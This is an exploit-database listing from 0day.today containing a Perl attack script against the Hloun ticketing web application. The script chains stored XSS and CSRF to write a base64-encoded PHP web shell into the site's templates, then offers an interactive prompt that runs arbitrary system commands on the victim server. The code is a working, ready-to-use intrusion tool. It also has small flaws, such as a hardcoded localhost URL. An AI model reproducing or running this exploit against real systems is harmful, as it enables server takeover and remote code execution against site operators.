[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hloun v1.0.x => xss csrf to inject php code

Author
Or4nG.M4N
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17582
Category
web applications
Date add
26-02-2012
Platform
php
#!/usr/bin/perl
# Title    : Hloun v1.0.x => xss csrf to inject php code
# Author   : Or4nG.M4n
# Version  : 1.0.x
# Homepage : http://www.hloun.in/
# video    : http://youtu.be/62H3ojk2c-k
# Note     : ~: welcome back www.Sec4ever.com :~
#         Hloun v1.0.x => xss csrf to inject php code  
use LWP::UserAgent;
use LWP::Simple;
system("cls");
print
"
+---------------------------------------------+\n
| Hloun v1.0.x => xss csrf to inject php code |\n
|      Or4nG.M4n  : priv8te\@hotmail.com      |\n
+---------------------------------------------+\n
Loading ...\n
";
sleep(3);
print "http://tragt & path #";
$h = <STDIN>;
chomp $h;
$html = '<form method="post" name="xss" action="http://'.$h.'/admin/style.php?step=tmp_update&id=1&file1=inject.php">
<textarea cols="82" name="text"
rows="23"><?eval(base64_decode("JGNtZCA9ICRfR0VUWyJjbWQiXTsKcHJpbnQgIlxuX19Db2RlX19cbiI7CkBzeXN0ZW0oJGNtZCk7CnByaW50ICJcbl9fQ29kZV9fXG4iOw=="));?></textarea></td></tr></table></form>
<script>document.xss.submit();</script>';
sleep(2);
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. \n";
sleep(2);
print "Please UPLOAD csrf.htm to your Site and Put's url here #";
$csrf = <STDIN>;
chomp $csrf;
$done = '<iframe id="iframe" src="'.$csrf.'"></iframe>';
sleep(1);
print "injection code wait plaese \n";
sleep(1);
$inject = $done;
print "Email #";
my $inj2 = <STDIN>;
chomp $inj2;
$post1 = "test%3Cbr%3E";
$post2 = "%D8%A7%D8%B6%D8%A7%D9%81%D8%A9";
my $url = 'http://localhost/hloun/tickets.php?step=add_insert';
my $ua       = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'ticket_name' => $inject , 'username' => $inject , 'usermail' => $inj2 , 'website' => google , 'ticket_page' => $post1 , 'add' => $post2} ); 
my $contented  = $response->decoded_content();
print "\n done injection \n";
print "\n hit any key to continue";
$continue = <>;
for($ops=0;$ops<15;$ops++)
{
print "
Command# ";
$execut =<STDIN>;
chomp($execut);
$ex = $h."/templates/default/tmp/inject.php?cmd=".$execut;
my $content = get $ex;
while($content =~ m{__Code__(.*?)__code__(.*)}g){
print "\n [+]Executing\n\n";
}
print  $content;
}



#  0day.today [2024-09-28]  #